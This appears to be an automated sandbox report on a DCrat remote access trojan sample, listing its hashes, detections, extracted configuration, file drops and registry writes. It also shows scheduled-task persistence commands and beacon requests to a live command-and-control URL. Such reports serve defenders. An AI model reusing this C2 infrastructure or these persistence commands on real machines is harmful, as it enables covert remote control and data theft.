File name:

63cfc67e3f30eef4f069d4c50afec506.exe

Full analysis: https://app.any.run/tasks/27874cb9-c4a8-4562-9651-97ddb5964a77
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Malware Trends Tracker     >>>
Analysis date: June 29, 2025, 00:52:38
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-sch
dcrat
rat
remote
darkcrystal
stealer
netreactor
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

63CFC67E3F30EEF4F069D4C50AFEC506

SHA1:

F4478A50A34E13E40952AC628A2A5826BBE2F192

SHA256:

E32189A7ED7A618F12F3B10949CBAA32566DA801D7541C58F338261391F5FE40

SSDEEP:

24576:QZPrK87M5rSvYhHICazxacB9BI8jqUiDn9+e4hrWZHZ1kk2H:QFrKj5GYhHICazxacB92pD7HEk2H

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 2080)

    • DCRAT mutex has been found

      • portbroker.exe (PID: 3964)
      • uhssvc.exe (PID: 856)

    • Actions looks like stealing of personal data

      • uhssvc.exe (PID: 856)

    • DARKCRYSTAL has been detected (SURICATA)

      • uhssvc.exe (PID: 856)

    • DCRAT has been detected (YARA)

      • uhssvc.exe (PID: 856)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 63cfc67e3f30eef4f069d4c50afec506.exe (PID: 7156)
      • portbroker.exe (PID: 3964)

    • Reads security settings of Internet Explorer

      • 63cfc67e3f30eef4f069d4c50afec506.exe (PID: 7156)
      • portbroker.exe (PID: 3964)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2080)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2080)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 2080)

    • Executed via WMI

      • schtasks.exe (PID: 7004)
      • schtasks.exe (PID: 7104)
      • schtasks.exe (PID: 4500)
      • schtasks.exe (PID: 5876)
      • schtasks.exe (PID: 5168)
      • schtasks.exe (PID: 1164)
      • schtasks.exe (PID: 2320)
      • schtasks.exe (PID: 6412)
      • schtasks.exe (PID: 2468)
      • schtasks.exe (PID: 5012)
      • schtasks.exe (PID: 4948)
      • schtasks.exe (PID: 4444)

    • The process creates files with name similar to system file names

      • portbroker.exe (PID: 3964)

    • Reads the date of Windows installation

      • portbroker.exe (PID: 3964)

    • Starts itself from another location

      • portbroker.exe (PID: 3964)

    • There is functionality for taking screenshot (YARA)

      • uhssvc.exe (PID: 856)

  • INFO

    • Reads the computer name

      • 63cfc67e3f30eef4f069d4c50afec506.exe (PID: 7156)
      • portbroker.exe (PID: 3964)
      • upfc.exe (PID: 2976)
      • SearchApp.exe (PID: 6400)
      • dasHost.exe (PID: 1468)
      • uhssvc.exe (PID: 856)
      • uhssvc.exe (PID: 5960)
      • dasHost.exe (PID: 420)

    • Checks supported languages

      • 63cfc67e3f30eef4f069d4c50afec506.exe (PID: 7156)
      • portbroker.exe (PID: 3964)
      • uhssvc.exe (PID: 856)
      • SearchApp.exe (PID: 6400)
      • upfc.exe (PID: 2976)
      • dasHost.exe (PID: 1468)
      • uhssvc.exe (PID: 5960)
      • dasHost.exe (PID: 420)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • 63cfc67e3f30eef4f069d4c50afec506.exe (PID: 7156)

    • Process checks computer location settings

      • 63cfc67e3f30eef4f069d4c50afec506.exe (PID: 7156)
      • portbroker.exe (PID: 3964)

    • The sample compiled with english language support

      • 63cfc67e3f30eef4f069d4c50afec506.exe (PID: 7156)
      • portbroker.exe (PID: 3964)

    • Reads Environment values

      • portbroker.exe (PID: 3964)
      • uhssvc.exe (PID: 856)
      • SearchApp.exe (PID: 6400)
      • upfc.exe (PID: 2976)
      • dasHost.exe (PID: 1468)
      • uhssvc.exe (PID: 5960)
      • dasHost.exe (PID: 420)

    • Reads the machine GUID from the registry

      • portbroker.exe (PID: 3964)
      • SearchApp.exe (PID: 6400)
      • upfc.exe (PID: 2976)
      • uhssvc.exe (PID: 856)
      • dasHost.exe (PID: 420)
      • uhssvc.exe (PID: 5960)
      • dasHost.exe (PID: 1468)

    • Failed to create an executable file in Windows directory

      • portbroker.exe (PID: 3964)

    • Manual execution by a user

      • SearchApp.exe (PID: 6400)
      • upfc.exe (PID: 2976)
      • dasHost.exe (PID: 1468)
      • dasHost.exe (PID: 420)
      • uhssvc.exe (PID: 5960)

    • Checks proxy server information

      • uhssvc.exe (PID: 856)
      • slui.exe (PID: 2532)

    • Disables trace logs

      • uhssvc.exe (PID: 856)

    • .NET Reactor protector has been detected

      • uhssvc.exe (PID: 856)

    • Reads the software policy settings

      • slui.exe (PID: 2532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

DcRat

(PID) Process(856) uhssvc.exe
C2 (1)http://ct75800.tw1.ru/24e1bab6
Options
MutexDCR_MUTEX-AKBDaRbO5BAtQNMsx6By
searchpath%UsersFolder% - Fast
Targetals
C2 (1)http://ct75800.tw1.ru/24e1bab6
Options
MutexDCR_MUTEX-AKBDaRbO5BAtQNMsx6By
Debugfalse
ServerConfigReplacementTable
0^
5<
6(
9>
O`
Z|
m)
E&
u#
i$
D
I.
d~
h!
C*
n-
S%
y@
w,
o_
N;
PluginConfigReplacementTable
0
6|
I*
X^
S!
f,
e.
j(
Q$
b;
l`
x-
w>
c)
p~
=&
M#
y_
D%
i<
GetWebcamsfalse
SleepTimeout5
InactivityTimeout2
CacheStorageRegistry
AutoRunSmart
StealerConfig
searchpath%UsersFolder% - Fast
StealerEnabledfalse
StealerOptionsfalse
SelfDeletefalse
Version4.5.32
ServerTypeC#
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 346112
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
158
Monitored processes
25
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 63cfc67e3f30eef4f069d4c50afec506.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs #DCRAT portbroker.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DCRAT uhssvc.exe searchapp.exe no specs upfc.exe no specs dashost.exe no specs uhssvc.exe no specs dashost.exe no specs slui.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
420C:\Users\admin\dasHost.exeC:\Users\admin\dasHost.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\users\admin\dashost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
768C:\WINDOWS\system32\cmd.exe /c ""C:\Portagentprovider\FLL5z6gl.bat" "C:\Windows\SysWOW64\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
856"C:\Users\Default\Music\uhssvc.exe" C:\Users\Default\Music\uhssvc.exe
portbroker.exe
User:
admin
Integrity Level:
MEDIUM
Version:
5.15.2.0
Modules
Images
c:\users\default\music\uhssvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
DcRat
(PID) Process(856) uhssvc.exe
C2 (1)http://ct75800.tw1.ru/24e1bab6
Options
MutexDCR_MUTEX-AKBDaRbO5BAtQNMsx6By
searchpath%UsersFolder% - Fast
Targetals
(PID) Process(856) uhssvc.exe
C2 (1)http://ct75800.tw1.ru/24e1bab6
Options
MutexDCR_MUTEX-AKBDaRbO5BAtQNMsx6By
Debugfalse
ServerConfigReplacementTable
0^
5<
6(
9>
O`
Z|
m)
E&
u#
i$
D
I.
d~
h!
C*
n-
S%
y@
w,
o_
N;
PluginConfigReplacementTable
0
6|
I*
X^
S!
f,
e.
j(
Q$
b;
l`
x-
w>
c)
p~
=&
M#
y_
D%
i<
GetWebcamsfalse
SleepTimeout5
InactivityTimeout2
CacheStorageRegistry
AutoRunSmart
StealerConfig
searchpath%UsersFolder% - Fast
StealerEnabledfalse
StealerOptionsfalse
SelfDeletefalse
Version4.5.32
ServerTypeC#
1164schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 12 /tr "'C:\Users\admin\dasHost.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1296\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1468C:\Users\admin\dasHost.exeC:\Users\admin\dasHost.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\users\admin\dashost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2080"C:\WINDOWS\System32\WScript.exe" "C:\Portagentprovider\1DUgS5Zq7Jr.vbe" C:\Windows\SysWOW64\wscript.exe63cfc67e3f30eef4f069d4c50afec506.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2200C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2320schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Users\admin\dasHost.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2468schtasks.exe /create /tn "uhssvc" /sc ONLOGON /tr "'C:\Users\Default\Music\uhssvc.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
3 883
Read events
3 866
Write events
17
Delete events
0

Modification events

(PID) Process:(7156) 63cfc67e3f30eef4f069d4c50afec506.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(3964) portbroker.exeKey:HKEY_CURRENT_USER\SOFTWARE\c3817c1f6d0fc0fdb5902b4ab55116c1f8e59f41
Operation:writeName:aa40845114b55169e54c522d3b3563d2424a170c
Value:
WyJDOlxcUG9ydGFnZW50cHJvdmlkZXJcXHBvcnRicm9rZXIuZXhlIiwiQzpcXFBvcnRhZ2VudHByb3ZpZGVyXFxTZWFyY2hBcHAuZXhlIiwiQzpcXFBvcnRhZ2VudHByb3ZpZGVyXFx1cGZjLmV4ZSIsIkM6XFxVc2Vyc1xcYWRtaW5cXGRhc0hvc3QuZXhlIiwiQzpcXFVzZXJzXFxEZWZhdWx0XFxNdXNpY1xcdWhzc3ZjLmV4ZSJd
(PID) Process:(856) uhssvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\uhssvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(856) uhssvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\uhssvc_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(856) uhssvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\uhssvc_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(856) uhssvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\uhssvc_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(856) uhssvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\uhssvc_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(856) uhssvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\uhssvc_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(856) uhssvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\uhssvc_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(856) uhssvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\uhssvc_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
5
Suspicious files
1
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
715663cfc67e3f30eef4f069d4c50afec506.exeC:\Portagentprovider\FLL5z6gl.battext
MD5:2E04CEC503CDAD0154C5412BEF64A54C
SHA256:AA0E01423203F34C18C9959F3F6E2002681D510C059FBA9B8F86D4A7772001D6
3964portbroker.exeC:\Portagentprovider\SearchApp.exeexecutable
MD5:87722A7300C7488152DAA0700A51FD56
SHA256:28129913F5229331160D921602D8B4569544F2AD88039C672F15EF03A8EFF455
715663cfc67e3f30eef4f069d4c50afec506.exeC:\Portagentprovider\portbroker.exeexecutable
MD5:87722A7300C7488152DAA0700A51FD56
SHA256:28129913F5229331160D921602D8B4569544F2AD88039C672F15EF03A8EFF455
3964portbroker.exeC:\Users\admin\dasHost.exeexecutable
MD5:87722A7300C7488152DAA0700A51FD56
SHA256:28129913F5229331160D921602D8B4569544F2AD88039C672F15EF03A8EFF455
3964portbroker.exeC:\Portagentprovider\ea1d8f6d871115text
MD5:FD0AA81B9C6531F348C6E5ACAC2CDD1D
SHA256:FC84F148F814ED869B6018C6B20F27DCE511F7921A54B52C04D9161783D17E4F
3964portbroker.exeC:\Portagentprovider\upfc.exeexecutable
MD5:87722A7300C7488152DAA0700A51FD56
SHA256:28129913F5229331160D921602D8B4569544F2AD88039C672F15EF03A8EFF455
3964portbroker.exeC:\Users\admin\21b1a557fd31cctext
MD5:6401561A026F755C54449D45D2FFBEE2
SHA256:F45ABCF5AB73B783F56F43CC67134BD6BE38952C1A482E119E5707BACC8EBF74
3964portbroker.exeC:\Users\Default\Music\105eec298f1910text
MD5:A85B6895B4B947482DE4A5CACAB12624
SHA256:8EA3341B7A0C4A0C40023BCB2A7C551EBD5ED20A7C3FE6F18C3B4AA4D6B62282
3964portbroker.exeC:\Users\Default\Music\uhssvc.exeexecutable
MD5:87722A7300C7488152DAA0700A51FD56
SHA256:28129913F5229331160D921602D8B4569544F2AD88039C672F15EF03A8EFF455
715663cfc67e3f30eef4f069d4c50afec506.exeC:\Portagentprovider\1DUgS5Zq7Jr.vbebinary
MD5:F5DB4CAF1D4EA165DC5A1A3A63810E9F
SHA256:69D98FA371C3E9CE273AD65D1C49C5BCA5EA6190AE71781DEAA25742C9F403CA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
112
TCP/UDP connections
26
DNS requests
20
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
856
uhssvc.exe
GET
200
188.225.23.151:80
http://ct75800.tw1.ru/24e1bab6.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&656d491dcc64a87307ba6e7997d61748=gNihzY4QzYllDZzQGMkdDNxQjY5UDNyAjM1AzM0UGM0kDN3QTNjBDMxQjN4gTM2MTMzgjMxATO&5a2622b8407fb4244232432693edbdf4=QY4gjZ0QmNxgTYzAzN4U2YwYjYidzM4YWYjJDNwcDZwMWNykjN3ImM&5869f62f557e5e1f43a94f0b20213fdf=0VfiIiOiQWYkBTNmVGNiFmM1MGMmZTYzUGMmZzY5EmN3MTZ3EGOiwiIiRTYjN2NiNDO5cDO5gTZ3gTY2YmYhZWNzEGOjFmY3ATOjdjYyETYiJiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W
unknown
whitelisted
856
uhssvc.exe
GET
200
188.225.23.151:80
http://ct75800.tw1.ru/24e1bab6.php?bJmoj5HVxccePMxoL1P=JD3Rrp8KjoM0qFTg0PUr4&d51ca3d1a7856a032609d3686dfffa7a=b484d49e54684b000819fcf392b8add7&5a2622b8407fb4244232432693edbdf4=QNkdTZ3gjM1MWNmNTNkR2MkZDZ0EjNjNTOhJzNkJWN3ITZmBDOwEGM&bJmoj5HVxccePMxoL1P=JD3Rrp8KjoM0qFTg0PUr4
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
856
uhssvc.exe
GET
200
188.225.23.151:80
http://ct75800.tw1.ru/24e1bab6.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&656d491dcc64a87307ba6e7997d61748=gNihzY4QzYllDZzQGMkdDNxQjY5UDNyAjM1AzM0UGM0kDN3QTNjBDMxQjN4gTM2MTMzgjMxATO&5a2622b8407fb4244232432693edbdf4=QY4gjZ0QmNxgTYzAzN4U2YwYjYidzM4YWYjJDNwcDZwMWNykjN3ImM&3e8e7b78ec641ef2ab674c157cb4ab27=d1nIyATOmZzY4ADOyIjNhVzM2MTNjZDMykDO1ImNmNGZlFDM3EGN5kTOzIiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W&5869f62f557e5e1f43a94f0b20213fdf=QX9JiI6ICZhRGM1YWZ0IWYyUzYwYmNhNTZwYmNjlTY2czMldTY4ICLiIDM5YmNjhDM4IjM2EWNzYzM1MmNwITO4UjY2Y2YkVWMwcTY0kTO5MjI6IiZwUjNiljZ2EWMkljYjFjMhRDOwMmMyUjNlhzMiNzNwICLigTZiBDMxM2YmhDNiNmNyUjZyMGZ1ATO3QDN1UzM1YDZkBjMlFzNiRmI6ISOklTOwEWY2kjM4IWOxUjNldDZ3MTNzYzM0YjM5kDO0Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTU9kMZpGT0cXaNJTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXS51EM0M1TwkkaMNTRq1UdFR1Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQWYkBTNmVGNiFmM1MGMmZTYzUGMmZzY5EmN3MTZ3EGOiwiI5MzMzUzNzE2MwY2Y5UmZmlDM4MTMhRDM4EGZzMjZ3YDM0czNlRTMhJiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W
unknown
whitelisted
856
uhssvc.exe
GET
200
188.225.23.151:80
http://ct75800.tw1.ru/24e1bab6.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&656d491dcc64a87307ba6e7997d61748=gNihzY4QzYllDZzQGMkdDNxQjY5UDNyAjM1AzM0UGM0kDN3QTNjBDMxQjN4gTM2MTMzgjMxATO&5a2622b8407fb4244232432693edbdf4=QY4gjZ0QmNxgTYzAzN4U2YwYjYidzM4YWYjJDNwcDZwMWNykjN3ImM&3e8e7b78ec641ef2ab674c157cb4ab27=d1nIyATOmZzY4ADOyIjNhVzM2MTNjZDMykDO1ImNmNGZlFDM3EGN5kTOzIiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W&5869f62f557e5e1f43a94f0b20213fdf=QX9JiI6ICZhRGM1YWZ0IWYyUzYwYmNhNTZwYmNjlTY2czMldTY4ICLiIDM5YmNjhDM4IjM2EWNzYzM1MmNwITO4UjY2Y2YkVWMwcTY0kTO5MjI6IiZwUjNiljZ2EWMkljYjFjMhRDOwMmMyUjNlhzMiNzNwICLigTZiBDMxM2YmhDNiNmNyUjZyMGZ1ATO3QDN1UzM1YDZkBjMlFzNiRmI6ISOklTOwEWY2kjM4IWOxUjNldDZ3MTNzYzM0YjM5kDO0Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTU9kMZpGT0cXaNJTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXS51EM0M1TwkkaMNTRq1UdFR1Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQWYkBTNmVGNiFmM1MGMmZTYzUGMmZzY5EmN3MTZ3EGOiwiI5MzMzUzNzE2MwY2Y5UmZmlDM4MTMhRDM4EGZzMjZ3YDM0czNlRTMhJiOiYGM1YjY5YmNhFDZ5I2YxITY0gDMjJjM1YTZ4MjYzcDMiwiI4UmYwATMjNmZ4QjYjZjM1YmMjRWNwkzN0QTN1MTN2QGZwITZxcjYkJiOikDZ5kDMhFmN5IDOilTM1YTZ3Q2NzUzM2MDN2ITO5gDNis3W
unknown
whitelisted
856
uhssvc.exe
GET
200
188.225.23.151:80
